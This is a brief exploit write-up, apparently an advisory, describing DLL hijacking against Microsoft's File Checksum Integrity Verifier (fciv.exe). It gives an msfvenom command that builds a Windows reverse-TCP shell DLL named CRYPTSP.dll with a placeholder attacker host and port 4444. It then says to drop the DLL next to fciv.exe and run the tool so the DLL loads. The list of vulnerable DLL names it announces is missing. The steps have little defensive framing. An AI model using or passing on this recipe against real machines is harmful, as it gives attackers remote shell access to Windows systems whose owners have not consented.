Microsoft File CheckSum DLL hijacking Attack

file checsum with a process fciv.exe will load and execute malicious Dynamic Link Libraries {DLL} while using the following vulnerable names :


the process of exploitation occurs while placing these remade dll files in the same directory of FCIV .

so if an attacker is able to place one of these Vulnerable DLL , the execution of file verification will load these malicious dll directly .


  • Generate reverse shell tcp payload using msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=attackerip LPORT=4444 -f dll > /root/CRYPTSP.dll
  • Place DLL file on the same directory of fciv executable

  • execute fciv.exe with malicious dll file

fciv.exe CRYPTSP.dll